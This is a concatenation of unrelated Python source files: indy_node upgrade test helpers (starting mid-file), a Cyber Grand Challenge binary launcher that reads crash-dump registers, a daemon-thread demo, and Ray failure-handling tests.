from indy_node.server.upgrade_log import UpgradeLogData, UpgradeLog
from indy_node.server.upgrader import Upgrader
from indy_node.test.helper import TestNode
from indy_node.utils.node_control_tool import NodeControlTool
from indy_common.config_helper import NodeConfigHelper
logger = getlogger()
class TestNodeNoProtocolVersion(TestNode):
    """Test node that rejects any node request carrying a protocol version."""

    def processNodeRequest(self, request, frm):
        # This node only understands requests without protocolVersion set.
        if request.protocolVersion is not None:
            raise ValueError('Do not understand what protocolVersion is!!!')
        super().processNodeRequest(request, frm)
def sdk_send_upgrade(looper, sdk_pool_handle, sdk_wallet_trustee, upgrade_data):
    """Build a POOL_UPGRADE request from ``upgrade_data``, sign it with the
    trustee wallet and submit it to the pool. Returns the sent request."""
    _, did = sdk_wallet_trustee
    req = get_req_from_update(looper, did, upgrade_data)
    return sdk_sign_and_send_prepared_request(looper, sdk_wallet_trustee,
                                              sdk_pool_handle, req)
def sdk_ensure_upgrade_sent(looper, sdk_pool_handle,
                            sdk_wallet_trustee, upgrade_data):
    """Submit an upgrade request and wait until the pool replies to it."""
    req = sdk_send_upgrade(looper, sdk_pool_handle, sdk_wallet_trustee, upgrade_data)
    sdk_get_and_check_replies(looper, [req])
def get_req_from_update(looper, did, nup):
    """Build a POOL_UPGRADE request from the ``nup`` upgrade parameters."""
    schedule_json = json.dumps(nup['schedule']) if 'schedule' in nup else None
    return looper.loop.run_until_complete(
        build_pool_upgrade_request(
            did, nup['name'], nup['version'], nup['action'], nup['sha256'],
            nup['timeout'],
            schedule_json,
            nup.get('justification', 'null'),
            nup.get('reinstall'),
            nup.get(FORCE),
            nup.get('package', None)))
def clear_aq_stash(nodes):
    """Empty the upgrader's action-queue stash on every node."""
    for n in nodes:
        n.upgrader.aqStash.clear()
def checkUpgradeScheduled(nodes, version: str, schedule=None):
    """Assert that every node has exactly one queued upgrade action, scheduled
    for ``version`` (and, when ``schedule`` is given, at that node's time)."""
    for node in nodes:
        assert len(node.upgrader.aqStash) == 1
        assert node.upgrader.scheduledAction
        assert node.upgrader.scheduledAction.version.full == version
        if schedule:
            # The module only imports dateutil.tz; ``dateutil.parser`` is not
            # guaranteed to be importable as a bare attribute of ``dateutil``,
            # so import the submodule explicitly before use.
            import dateutil.parser
            assert node.upgrader.scheduledAction.when == \
                dateutil.parser.parse(schedule[node.id])
def checkNoUpgradeScheduled(nodes):
    """Assert that no node has any upgrade queued or scheduled."""
    for n in nodes:
        assert len(n.upgrader.aqStash) == 0
        assert n.upgrader.scheduledAction is None
def codeVersionInfo():
    """Return the running indy_node version as a tuple of release parts."""
    return indy_node.__version_info__.parts
def releaseVersion():
    """Return the three-component (major.minor.patch) release string."""
    return '.'.join(map(str, codeVersionInfo()[:3]))
def bumpVersion(v):
    """Return ``v`` with its last dot-separated component incremented by one."""
    head, _, tail = v.rpartition('.')
    bumped = str(int(tail) + 1)
    return head + '.' + bumped if head else bumped
def lowerVersion(v):
    """Return ``v`` with its rightmost non-zero component decremented by one.

    Raises ValueError when every component is already zero.
    """
    parts = v.split('.')
    for idx in range(len(parts) - 1, -1, -1):
        val = int(parts[idx])
        if val > 0:
            parts[idx] = str(val - 1)
            return '.'.join(parts)
    raise ValueError('Version {} cannot be lowered'.format(v))
def bumpedVersion(ver=None):
    """Return a bumped copy of ``ver`` (defaults to the installed release)."""
    base = ver if ver else releaseVersion()
    return bumpVersion(base)
def loweredVersion():
    """Return the installed release version lowered by one (see lowerVersion)."""
    return lowerVersion(releaseVersion())
class NodeControlToolExecutor:
    """Run a NodeControlTool in a child process for the duration of a test."""

    def __init__(self, backup_dir, backup_target, transform=lambda tool: None):
        self.tool = NodeControlTool(backup_dir=backup_dir, backup_target=backup_target)
        # ``transform`` lets tests monkeypatch the tool before it starts.
        transform(self.tool)
        self.p = multiprocessing.Process(target=self.tool.start)
        self.p.start()
        logger.debug("NCTProcess was started with pid: {}".format(self.p.pid))

    def stop(self):
        """Close the tool's server socket and terminate the child process."""
        logger.debug("Send stop to NCTProcess with pid: {}".format(self.p.pid))
        self.tool.server.close()
        self.p.terminate()
        # check that process with NodeControlTool.start function really stop.
        # process.terminate() just send SIGTERM and is not guarantee that process stops
        if self.p.is_alive():
            logger.debug("NCTProcess still alive, with pid: {}".format(self.p.pid))
            # while process is still alive, join with main process and wait
            # FIXME: here was self.p.join(3), but since we've added (ok, Andrew Nikitin
            # has added) handler for SIGTERM here we wait for child process infinitely,
            # but for now we have no time to fix it in more elegant way as it is not a
            # real situation (Andrew said), so he has proposed this ugly hack.
            os.kill(self.p.pid, 9)
        logger.debug("NCTProcess must be stopped, with pid: {}".format(self.p.pid))
def composeUpgradeMessage(version, pkg_name: str = APP_NAME):
    """Serialize an upgrade control message as JSON-encoded bytes."""
    payload = {"version": version, "pkg_name": pkg_name, MESSAGE_TYPE: UPGRADE_MESSAGE}
    return json.dumps(payload).encode()
def sendUpgradeMessage(version, pkg_name: str = APP_NAME):
    """Send an upgrade control message to the local node-control service.

    Connects to (controlServiceHost, controlServicePort), sends the JSON
    message and always closes the socket.
    """
    sock = socket.create_connection(
        (controlServiceHost, controlServicePort))
    try:
        sock.sendall(composeUpgradeMessage(version, pkg_name=pkg_name))
    finally:
        # Previously the socket leaked if sendall() raised.
        sock.close()
def nodeControlGeneralMonkeypatching(tool, monkeypatch, tdir, stdout):
    """Patch ``tool`` for tests: fake subprocess.run results, isolate its
    directories under ``tdir`` and skip real data migration."""
    # Minimal stand-in for the object subprocess.run would return.
    ret = type("", (), {})()
    ret.returncode = 0
    ret.stdout = stdout if isinstance(stdout, bytes) else stdout.encode()
    tool.base_dir = tdir
    tool.indy_dir = os.path.join(tool.base_dir, '.indy')
    tool.tmp_dir = os.path.join(tool.base_dir, '.indy_tmp')
    if not os.path.exists(tool.indy_dir):
        os.mkdir(tool.indy_dir)
    if not os.path.exists(tool.tmp_dir):
        os.mkdir(tool.tmp_dir)
    monkeypatch.setattr(subprocess, 'run', lambda *x, **y: ret)
    monkeypatch.setattr(tool, '_do_migration', lambda *x: None)
def get_valid_code_hash():
    """Return a random 64-character string shaped like a sha256 hex digest."""
    return randomString(64)
def populate_log_with_upgrade_events(
        pool_txn_node_names, tdir, tconf, version: Tuple[str, str, str], pkg_name: str = APP_NAME):
    """Pre-seed each node's upgrade log with a scheduled + started event so
    the node believes an upgrade to ``version`` was in progress."""
    for nm in pool_txn_node_names:
        config_helper = NodeConfigHelper(nm, tconf, chroot=tdir)
        ledger_dir = config_helper.ledger_dir
        os.makedirs(ledger_dir)
        log = UpgradeLog(os.path.join(ledger_dir, tconf.upgradeLogFile))
        when = datetime.utcnow().replace(tzinfo=dateutil.tz.tzutc())
        ev_data = UpgradeLogData(when, version, randomString(10), pkg_name)
        log.append_scheduled(ev_data)
        log.append_started(ev_data)
def check_node_sent_acknowledges_upgrade(
        looper, node_set, node_ids, allowed_actions: List, ledger_size, expected_version):
    '''
    Check that each node has sent NODE_UPGRADE txn with the specified actions
    '''
    check = functools.partial(
        check_ledger_after_upgrade,
        node_set,
        allowed_actions,
        ledger_size,
        expected_version,
        node_ids=node_ids)
    timeout = plenumWaits.expectedTransactionExecutionTime(len(node_set))
    # Retry the ledger check until it passes or the expected execution
    # timeout elapses.
    looper.run(
        eventually(
            check,
            retryWait=1,
            timeout=timeout))
def emulate_restart_pool_for_upgrade(nodes):
    """Mimic a full pool restart: rebuild each node's upgrader and have the
    node acknowledge the upgrade."""
    for n in nodes:
        n.upgrader = n.init_upgrader()
        n.acknowledge_upgrade()
def emulate_view_change_pool_for_upgrade(nodes):
    """Mimic a view change: replay the config ledger, then acknowledge."""
    for n in nodes:
        n.upgrader.processLedger()
        n.acknowledge_upgrade()
def check_node_do_not_sent_acknowledges_upgrade(
        looper, node_set, node_ids, allowed_actions: List, ledger_size, expected_version):
    '''
    Check that no node has sent an extra NODE_UPGRADE txn: after a short wait
    the config ledger must still match the expected size and contents.
    '''
    # Give the pool time in which an (unexpected) txn could appear, then
    # assert the ledger still matches expectations.
    looper.runFor(5)
    check_ledger_after_upgrade(node_set, allowed_actions,
                               ledger_size, expected_version,
                               node_ids=node_ids)
def clear_config_ledger(node_set):
    """Wipe each node's config ledger: uncommitted txns, txn log and tree."""
    for n in node_set:
        ledger = n.configLedger
        ledger.reset_uncommitted()
        ledger._transactionLog.reset()
        ledger.tree.reset()
def check_ledger_after_upgrade(
        node_set,
        allowed_actions,
        ledger_size,
        expected_version,
        allowed_txn_types=None,
        node_ids=None):
    """Assert every node's config ledger has ``ledger_size`` txns, that each
    txn is of an allowed type with an allowed action, and that exactly one
    version — ``expected_version`` — appears across the pool.

    ``allowed_txn_types`` defaults to [NODE_UPGRADE]; previously this was a
    mutable default argument shared across calls.
    """
    if allowed_txn_types is None:
        allowed_txn_types = [NODE_UPGRADE]
    versions = set()
    for node in node_set:
        # (removed stray debug print of the ledger size)
        assert len(node.configLedger) == ledger_size
        ids = set()
        for _, txn in node.configLedger.getAllTxn():
            # ``txn_type`` was previously named ``type``, shadowing the builtin.
            txn_type = get_type(txn)
            assert txn_type in allowed_txn_types
            txn_data = get_payload_data(txn)
            data = txn_data
            if txn_type == NODE_UPGRADE:
                data = txn_data[DATA]
            assert data[ACTION]
            assert data[ACTION] in allowed_actions
            ids.add(get_from(txn))
            assert data[VERSION]
            versions.add(data[VERSION])
        ids.add(node.id)
        if node_ids:
            assert ids == set(node_ids)
    assert len(versions) == 1
    assert list(versions)[0] == expected_version
def check_no_loop(nodeSet, ev_type, pkg_name: str = APP_NAME):
    """Simulate an upgrade start plus node restart and assert the upgrader
    does not re-schedule (loop on) the same upgrade: the action log must end
    with ``ev_type`` and scheduledAction must stay None."""
    for node in nodeSet:
        # mimicking upgrade start
        node.upgrader._actionLog.append_started(
            UpgradeLogData(
                datetime.utcnow().replace(tzinfo=dateutil.tz.tzutc()),
                node.upgrader.scheduledAction.version,
                node.upgrader.scheduledAction.upgrade_id,
                pkg_name
            )
        )
        node.notify_upgrade_start()
        # mimicking upgrader's initialization after restart
        node.upgrader.process_action_log_for_first_run()
        node.upgrader.scheduledAction = None
        assert node.upgrader._actionLog.last_event.ev_type == ev_type
        # mimicking node's catchup after restart
        node.postConfigLedgerCaughtUp()
        assert node.upgrader.scheduledAction is None
        assert node.upgrader._actionLog.last_event.ev_type == ev_type
def sdk_change_bls_key(looper, txnPoolNodeSet,
                       node,
                       sdk_pool_handle,
                       sdk_wallet_steward,
                       add_wrong=False,
                       new_bls=None,
                       new_key_proof=None):
    """Rotate ``node``'s BLS key via a NODE txn and wait for the pool to sync.

    With ``add_wrong`` a freshly generated key (not installed on the node) is
    sent instead. ``new_bls`` / ``new_key_proof`` override the values put in
    the txn. Returns the new BLS public key.
    """
    if add_wrong:
        _, new_blspk, key_proof = create_default_bls_crypto_factory().generate_bls_keys()
    else:
        new_blspk, key_proof = init_bls_keys(node.keys_dir, node.name)
    key_in_txn = new_bls or new_blspk
    bls_key_proof = new_key_proof or key_proof
    node_dest = hexToFriendly(node.nodestack.verhex)
    sdk_send_update_node(looper, sdk_wallet_steward,
                         sdk_pool_handle,
                         node_dest, node.name,
                         None, None,
                         None, None,
                         bls_key=key_in_txn,
                         services=None,
                         key_proof=bls_key_proof)
    poolSetExceptOne = list(txnPoolNodeSet)
    poolSetExceptOne.remove(node)
    waitNodeDataEquality(looper, node, *poolSetExceptOne)
    sdk_pool_refresh(looper, sdk_pool_handle)
    # Write a throw-away NYM to verify ordering still works pool-wide.
    sdk_add_new_nym(looper, sdk_pool_handle, sdk_wallet_steward,
                    alias=randomString(5))
    ensure_all_nodes_have_same_data(looper, txnPoolNodeSet)
    return new_blspk
def count_action_log_entries(upg_log, func):
    """Count entries of ``upg_log`` for which ``func`` returns truthy."""
    return sum(1 for entry in upg_log if func(entry))
def count_action_log_package(upg_log, pkg_name):
    """Count action-log entries that refer to package ``pkg_name``."""
    return count_action_log_entries(upg_log, lambda entry: entry.data.pkg_name == pkg_name)
|
challenge_runner.py | #!/usr/bin/env python2
import os
import re
import signal
import subprocess as sp
from time import time, sleep
import threading
from common import IS_DARWIN, IS_LINUX, IS_WINDOWS, try_delete
# Path to crash dumps in windows
if IS_WINDOWS:
# NOTE: These may need to be changed depending on your setup
DUMP_DIR = os.path.join(os.path.expandvars('%LOCALAPPDATA%'), 'CrashDumps')
CDB_PATH = 'C:/Program Files (x86)/Windows Kits/10/Debuggers/x64/cdb.exe'
def run(challenges, timeout, seed, logfunc):
    """ Challenge launcher for replay services
    This will setup fds for all challenges according to:
    https://github.com/CyberGrandChallenge/cgc-release-documentation/blob/master/newsletter/ipc.md
    Args:
        challenges (list): List of absolute paths to all challenges to launch
        timeout (int): Maximum time in seconds a challenge is allowed to run for
        seed (str): Hex encoded seed for libcgc random
        logfunc ((str) -> None): Replayer log function used for reporting results
    Returns:
        (list): all processes that were started
    """
    cb_env = {'seed': seed}  # Environment variables for all challenges
    # This is the first fd after all of the challenges
    last_fd = 2 * len(challenges) + 3
    # Create all challenge fds
    if len(challenges) > 1:
        # Close fds where the pipes will be placed
        os.closerange(3, last_fd)
        new_fd = 3  # stderr + 1
        for i in xrange(len(challenges)):
            # Create a pipe for every running binary
            rpipe, wpipe = os.pipe()
            # The write end of the pipe needs to be at the lower fd, so it *may* get dup'd over the read end
            # Preemptively dup the read fd here to avoid the issue
            rpipe_tmp = os.dup(rpipe)
            pipe_fds = [wpipe, rpipe_tmp]
            # Duplicate the pipe ends to the correct fds if needed
            for fd in pipe_fds:
                if fd != new_fd:
                    os.dup2(fd, new_fd)
                new_fd += 1
            # Done with the temporary dup
            os.close(rpipe_tmp)
    # None of the above file descriptors will actually be inherited on Windows
    # Prepare the environment so libcgc can regenerate this setup
    # with the inherited HANDLEs
    if IS_WINDOWS:
        import msvcrt
        # Store the number of pipes that need to be set up
        numpipes = len(challenges) * 2  # Pipe pair for each
        cb_env['PIPE_COUNT'] = str(numpipes)
        # Store the HANDLE for each of the pipes
        for i in xrange(len(challenges) * 2):
            cb_env['PIPE_{}'.format(i)] = str(msvcrt.get_osfhandle(3 + i))  # First pipe is at 3
    # Start all challenges
    # Launch the main binary first
    mainchal, otherchals = challenges[0], challenges[1:]
    procs = [sp.Popen(mainchal, env=cb_env, stdin=sp.PIPE,
                      stdout=sp.PIPE, stderr=sp.PIPE)]
    # Any others should be launched with the same std i/o pipes
    # as the main binary
    if len(otherchals) > 0:
        main = procs[0]
        procs += [sp.Popen(c, env=cb_env, stdin=main.stdin,
                           stdout=main.stdout, stderr=main.stderr) for c in otherchals]
    # Start a watcher to report results when the challenges exit
    watcher = threading.Thread(target=chal_watcher, args=(challenges, procs, timeout, logfunc))
    watcher.setDaemon(True)
    watcher.start()
    return procs, watcher
def chal_watcher(paths, procs, timeout, log):
    """Wait for challenge processes to exit (or time out), report crashes with
    register dumps, then clean up ipc pipes and core files."""
    # Continue until any of the processes die
    # Wait until any process exits
    start = time()
    while time() - start < timeout \
            and all(proc.poll() is None for proc in procs):
        sleep(0.1)
    # Give the others a chance to exit
    while time() - start < timeout \
            and any(proc.poll() is None for proc in procs):
        sleep(0.1)
    # Kill any remaining processes
    for proc in procs:
        if proc.poll() is None:
            proc.terminate()
            proc.wait()
    # Close all of the ipc pipes
    if len(procs) > 1:
        last_fd = 2 * len(procs) + 3
        os.closerange(3, last_fd)
    # If any of the processes crashed, print out crash info
    for path, proc in zip(paths, procs):
        pid, sig = proc.pid, abs(proc.returncode)
        if sig not in [None, 0, signal.SIGTERM]:
            log('[DEBUG] pid: {}, sig: {}'.format(pid, sig))
            # Attempt to get register values
            regs = get_core_dump_regs(path, pid, log)
            if regs is not None:
                # If a core dump was generated, report this as a crash
                # log('Process generated signal (pid: {}, signal: {}) - {}\n'.format(pid, sig, testpath))
                log('Process generated signal (pid: {}, signal: {})'.format(pid, sig))
                # Report the register states
                reg_str = ' '.join(['{}:{}'.format(reg, val) for reg, val in regs.iteritems()])
                log('register states - {}'.format(reg_str))
    # Final cleanup
    clean_cores(paths, procs)
def get_core_dump_regs(path, pid, log):
    """ Read all register values from a core dump
    MacOS: all core dumps are stored as /cores/core.[pid]
    Linux: the core dump is stored as a 'core' file in the cwd
    Windows: If the given registry file was used, core dumps are stored in %LOCALAPPDATA%\CrashDumps
    Args:
        path (str): path to the executable that generated the dump
        pid (int): pid of the process that generated the core dump
        log ((str) -> None): logging function used to report information
    Returns:
        (dict): Registers and their values
    """
    # Find the core file
    # NOTE(review): on macOS/Linux, if none of these paths exist, fn_core
    # stays unbound and the debugger command below raises NameError — confirm
    # callers only reach here when a dump was produced.
    if os.path.exists('/cores/core.{}'.format(pid)):
        fn_core = '/cores/core.{}'.format(pid)
    if os.path.exists('core.{}'.format(pid)):
        fn_core = 'core.{}'.format(pid)
    if os.path.exists('core'):
        fn_core = 'core'
    # Create a gdb/lldb/cdb command to get regs
    if IS_DARWIN:
        cmd = [
            'lldb',
            '--core', fn_core,
            '--batch', '--one-line', 'register read'
        ]
    elif IS_LINUX:
        cmd = [
            'gdb',
            '--core', fn_core,
            '--batch', '-ex', 'info registers'
        ]
    elif IS_WINDOWS:
        # Dumps are named "[filename.exe].[pid].dmp"
        dmp_name = '{}.{}.dmp'.format(os.path.basename(path), pid)
        cmd = [
            CDB_PATH,
            '-z', os.path.join(DUMP_DIR, dmp_name),
            '-c', 'q'  # Registers already get printed when the dump is loaded
            # quit immediately
        ]
    # Read the registers
    dbg_out = '\n'.join(sp.Popen(cmd, stdout=sp.PIPE, stderr=sp.PIPE).communicate())
    # Batch commands return successful even if there was an error loading a file
    # Check for these strings in the output instead
    errs = [
        'No such file or directory',
        "doesn't exist",
        'cannot find the file specified'
    ]
    if any(err in dbg_out for err in errs):
        log('Core dump not found, are they enabled on your system?')
        return
    # Parse out registers/values
    regs = {}
    if IS_WINDOWS:
        # cdb prints e.g. "eax=0000002a" pairs
        for match in re.finditer(r'([a-z]+)=([a-fA-F0-9]+)', dbg_out):
            regs[match.group(1)] = match.group(2)
    else:
        for line in dbg_out.split('\n'):
            # Try to match a register value
            match = re.search(r'([a-z]+)[=\ ]+0x([a-fA-F0-9]+)', line)
            if match is not None:
                regs[match.group(1)] = match.group(2)
    return regs
def clean_cores(paths, procs):
    """ Delete all generated core dumps
    Args:
        paths (list): paths to all challenges that were launched
        procs (list): List of all processes that may have generated core dumps
    """
    if IS_DARWIN:
        # Python 2: map() runs eagerly, deleting each /cores/core.<pid> file.
        map(try_delete, ['/cores/core.{}'.format(p.pid) for p in procs])
    elif IS_LINUX:
        try_delete('core')
    elif IS_WINDOWS:
        for path, proc in zip(paths, procs):
            dmp_name = '{}.{}.dmp'.format(os.path.basename(path), proc.pid)
            try_delete(os.path.join(DUMP_DIR, dmp_name))
|
daemon.py | # daemon thread setting helps kill the thread after the main thread exits
import logging
import threading
from threading import Thread, Timer
from concurrent.futures import ThreadPoolExecutor
import time
import random
# Test function
def test():
    """Worker: log a heartbeat once a second for 60 seconds."""
    threadname = threading.current_thread().getName()
    logging.info(f'Thread starts: id = {threading.get_ident()} name = {threadname}')
    for x in range(60):
        logging.info('Working')
        time.sleep(1)
    logging.info(f'Thread ends: id = {threading.get_ident()} name = {threadname}')
def stop():
    """Timer callback meant to end the demo early.

    NOTE(review): exit(0) raises SystemExit inside the Timer thread only, so
    it terminates just that thread, not the whole program — confirm whether
    the intent was os._exit / a shared stop flag.
    """
    logging.info('Exiting the Test')
    exit(0)
def main():
    """Run the demo: a 3-second timer alongside a 60-second worker thread."""
    logging.basicConfig(format='%(levelname)s - %(asctime)s: %(message)s', datefmt='%H:%M:%S', level=logging.DEBUG)
    logging.info('Test Starting...')
    timer = Timer(3, stop)
    timer.start()
    # NOTE(review): daemon=False makes the process wait out the full worker
    # loop, despite the file header describing daemon threads being killed
    # when the main thread exits — confirm which behavior is intended.
    t = Thread(target=test, daemon=False)
    t.start()
    logging.info('Test Finished')


if __name__ == '__main__':
    main()
|
test_failure.py | import logging
import os
import sys
import tempfile
import threading
import time
import numpy as np
import pytest
import redis
import ray
import ray.ray_constants as ray_constants
from ray.exceptions import RayTaskError
from ray.cluster_utils import Cluster
from ray.test_utils import (
wait_for_condition,
SignalActor,
init_error_pubsub,
get_error_message,
)
def test_failed_task(ray_start_regular, error_pubsub):
    """Exceptions raised inside remote tasks must surface both on the error
    pubsub channel and as RayTaskError from ray.get()."""
    @ray.remote
    def throw_exception_fct1():
        raise Exception("Test function 1 intentionally failed.")

    @ray.remote
    def throw_exception_fct2():
        raise Exception("Test function 2 intentionally failed.")

    @ray.remote(num_returns=3)
    def throw_exception_fct3(x):
        raise Exception("Test function 3 intentionally failed.")

    p = error_pubsub
    # Fire-and-forget tasks: errors should still be pushed to the pubsub.
    throw_exception_fct1.remote()
    throw_exception_fct1.remote()
    msgs = get_error_message(p, 2, ray_constants.TASK_PUSH_ERROR)
    assert len(msgs) == 2
    for msg in msgs:
        assert "Test function 1 intentionally failed." in msg.error_message

    x = throw_exception_fct2.remote()
    try:
        ray.get(x)
    except Exception as e:
        assert "Test function 2 intentionally failed." in str(e)
    else:
        # ray.get should throw an exception.
        assert False

    # Every return ref of a multi-return task carries the failure.
    x, y, z = throw_exception_fct3.remote(1.0)
    for ref in [x, y, z]:
        try:
            ray.get(ref)
        except Exception as e:
            assert "Test function 3 intentionally failed." in str(e)
        else:
            # ray.get should throw an exception.
            assert False

    class CustomException(ValueError):
        pass

    @ray.remote
    def f():
        raise CustomException("This function failed.")

    try:
        ray.get(f.remote())
    except Exception as e:
        assert "This function failed." in str(e)
        # The original exception type is preserved alongside RayTaskError.
        assert isinstance(e, CustomException)
        assert isinstance(e, ray.exceptions.RayTaskError)
        assert "RayTaskError(CustomException)" in repr(e)
    else:
        # ray.get should throw an exception.
        assert False
def test_get_throws_quickly_when_found_exception(ray_start_regular):
    """ray.get on a batch must raise as soon as one ref fails, without
    waiting for a still-running task in the same batch."""
    # We use an actor instead of functions here. If we use functions, it's
    # very likely that two normal tasks are submitted before the first worker
    # is registered to Raylet. Since `maximum_startup_concurrency` is 1,
    # the worker pool will wait for the registration of the first worker
    # and skip starting new workers. The result is, the two tasks will be
    # executed sequentially, which breaks an assumption of this test case -
    # the two tasks run in parallel.
    @ray.remote
    class Actor(object):
        def bad_func1(self):
            raise Exception("Test function intentionally failed.")

        def bad_func2(self):
            # Kill the worker process abruptly (simulates an actor death).
            os._exit(0)

        def slow_func(self, signal):
            ray.get(signal.wait.remote())

    def expect_exception(objects, exception):
        with pytest.raises(ray.exceptions.RayError) as err:
            ray.get(objects)
        assert err.type is exception

    signal1 = SignalActor.remote()
    actor = Actor.options(max_concurrency=2).remote()
    expect_exception(
        [actor.bad_func1.remote(),
         actor.slow_func.remote(signal1)], ray.exceptions.RayTaskError)
    ray.get(signal1.send.remote())

    signal2 = SignalActor.remote()
    actor = Actor.options(max_concurrency=2).remote()
    expect_exception(
        [actor.bad_func2.remote(),
         actor.slow_func.remote(signal2)], ray.exceptions.RayActorError)
    ray.get(signal2.send.remote())
def test_fail_importing_remote_function(ray_start_2_cpus, error_pubsub):
    """A remote function whose closure can't be unpickled on workers must
    push REGISTER_REMOTE_FUNCTION_PUSH_ERROR and raise on invocation."""
    p = error_pubsub
    # Create the contents of a temporary Python file.
    temporary_python_file = """
def temporary_helper_function():
    return 1
"""

    f = tempfile.NamedTemporaryFile(suffix=".py")
    f.write(temporary_python_file.encode("ascii"))
    f.flush()
    directory = os.path.dirname(f.name)
    # Get the module name and strip ".py" from the end.
    module_name = os.path.basename(f.name)[:-3]
    sys.path.append(directory)
    module = __import__(module_name)

    # Define a function that closes over this temporary module. This should
    # fail when it is unpickled.
    @ray.remote
    def g(x, y=3):
        try:
            module.temporary_python_file()
        except Exception:
            # This test is not concerned with the error from running this
            # function. Only from unpickling the remote function.
            pass

    # Invoke the function so that the definition is exported.
    g.remote(1, y=2)
    errors = get_error_message(
        p, 2, ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
    assert errors[0].type == ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR
    assert "No module named" in errors[0].error_message
    assert "No module named" in errors[1].error_message

    # Check that if we try to call the function it throws an exception and
    # does not hang.
    for _ in range(10):
        with pytest.raises(
                Exception, match="This function was not imported properly."):
            ray.get(g.remote(1, y=2))

    f.close()

    # Clean up the junk we added to sys.path.
    sys.path.pop(-1)
def test_failed_function_to_run(ray_start_2_cpus, error_pubsub):
    """A failing setup function run on all workers must push one
    FUNCTION_TO_RUN_PUSH_ERROR per worker carrying its message."""
    pubsub = error_pubsub

    def failing_setup(worker):
        # Only raise on real workers, never on the driver process.
        if ray.worker.global_worker.mode == ray.WORKER_MODE:
            raise Exception("Function to run failed.")

    ray.worker.global_worker.run_function_on_all_workers(failing_setup)
    # Check that the error message is in the task info.
    errors = get_error_message(pubsub, 2,
                               ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
    assert len(errors) == 2
    assert errors[0].type == ray_constants.FUNCTION_TO_RUN_PUSH_ERROR
    assert "Function to run failed." in errors[0].error_message
    assert "Function to run failed." in errors[1].error_message
def test_fail_importing_actor(ray_start_regular, error_pubsub):
    """An actor class that cannot be unpickled on the worker must push
    registration/init errors and raise (not hang) on method calls."""
    p = error_pubsub
    # Create the contents of a temporary Python file.
    temporary_python_file = """
def temporary_helper_function():
    return 1
"""
    f = tempfile.NamedTemporaryFile(suffix=".py")
    f.write(temporary_python_file.encode("ascii"))
    f.flush()
    directory = os.path.dirname(f.name)
    # Get the module name and strip ".py" from the end.
    module_name = os.path.basename(f.name)[:-3]
    sys.path.append(directory)
    module = __import__(module_name)
    # Define an actor that closes over this temporary module. This should
    # fail when it is unpickled.
    @ray.remote
    class Foo:
        def __init__(self, arg1, arg2=3):
            self.x = module.temporary_python_file()
        def get_val(self, arg1, arg2=3):
            return 1
    # There should be no errors yet.
    errors = get_error_message(p, 2)
    assert len(errors) == 0
    # Create an actor.
    foo = Foo.remote(3, arg2=0)
    # Two errors are expected: one for class registration, one for the
    # failed __init__; their arrival order is not fixed, hence the loop.
    errors = get_error_message(p, 2)
    assert len(errors) == 2
    for error in errors:
        # Wait for the error to arrive.
        if error.type == ray_constants.REGISTER_ACTOR_PUSH_ERROR:
            assert "No module named" in error.error_message
        else:
            # Wait for the error from when the __init__ tries to run.
            assert ("failed to be imported, and so cannot execute this method"
                    in error.error_message)
    # Check that if we try to get the function it throws an exception and
    # does not hang.
    with pytest.raises(Exception, match="failed to be imported"):
        ray.get(foo.get_val.remote(1, arg2=2))
    # Wait for the error from when the call to get_val.
    errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.TASK_PUSH_ERROR
    assert ("failed to be imported, and so cannot execute this method" in
            errors[0].error_message)
    f.close()
    # Clean up the junk we added to sys.path.
    sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular, error_pubsub):
    """Errors from a failing actor constructor must be pushed both for
    the constructor task and for subsequent method calls."""
    p = error_pubsub
    error_message1 = "actor constructor failed"
    error_message2 = "actor method failed"
    @ray.remote
    class FailedActor:
        def __init__(self):
            raise Exception(error_message1)
        def fail_method(self):
            raise Exception(error_message2)
    a = FailedActor.remote()
    # Make sure that we get errors from a failed constructor.
    errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.TASK_PUSH_ERROR
    assert error_message1 in errors[0].error_message
    # Make sure that we get errors from a failed method.
    a.fail_method.remote()
    errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.TASK_PUSH_ERROR
    # NOTE(review): checking error_message1 (not error_message2) here is
    # intentional: the constructor failed, so fail_method never runs and
    # the constructor's failure is what the method-call error carries.
    assert error_message1 in errors[0].error_message
def test_failed_actor_method(ray_start_regular, error_pubsub):
    """An exception raised inside an actor method must be pushed to the
    driver as a TASK_PUSH_ERROR containing the method's message."""
    method_error = "actor method failed"

    @ray.remote
    class FailedActor:
        def __init__(self):
            pass

        def fail_method(self):
            raise Exception(method_error)

    actor = FailedActor.remote()
    # Invoke the failing method and expect exactly one task error.
    actor.fail_method.remote()
    errors = get_error_message(error_pubsub, 1, ray_constants.TASK_PUSH_ERROR)
    assert len(errors) == 1
    failure = errors[0]
    assert failure.type == ray_constants.TASK_PUSH_ERROR
    assert method_error in failure.error_message
def test_incorrect_method_calls(ray_start_regular):
    """Calling an actor constructor or method with the wrong arity, or a
    method that does not exist, must raise instead of hanging."""
    @ray.remote
    class Actor:
        def __init__(self, missing_variable_name):
            pass

        def get_val(self, x):
            pass

    # Constructor arity errors: too few, then too many arguments.
    for bad_args in ((), (1, 2)):
        with pytest.raises(Exception):
            Actor.remote(*bad_args)
    # The correct number of arguments works.
    actor = Actor.remote(1)
    # Method arity errors: too few, then too many arguments.
    for bad_args in ((), (1, 2)):
        with pytest.raises(Exception):
            actor.get_val.remote(*bad_args)
    # A nonexistent method fails both with and without .remote().
    with pytest.raises(AttributeError):
        actor.nonexistent_method()
    with pytest.raises(AttributeError):
        actor.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular, error_pubsub):
    """A failure in the worker's own bookkeeping, after the task body has
    already completed, must be reported as a WORKER_CRASH_PUSH_ERROR."""
    p = error_pubsub
    @ray.remote(max_calls=2)
    def f():
        # This is the only reasonable variable we can set here that makes the
        # execute_task function fail after the task got executed.
        worker = ray.worker.global_worker
        worker.function_actor_manager.increase_task_counter = None
    # Running this task should cause the worker to raise an exception after
    # the task has successfully completed.
    f.remote()
    errors = get_error_message(p, 1, ray_constants.WORKER_CRASH_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.WORKER_CRASH_PUSH_ERROR
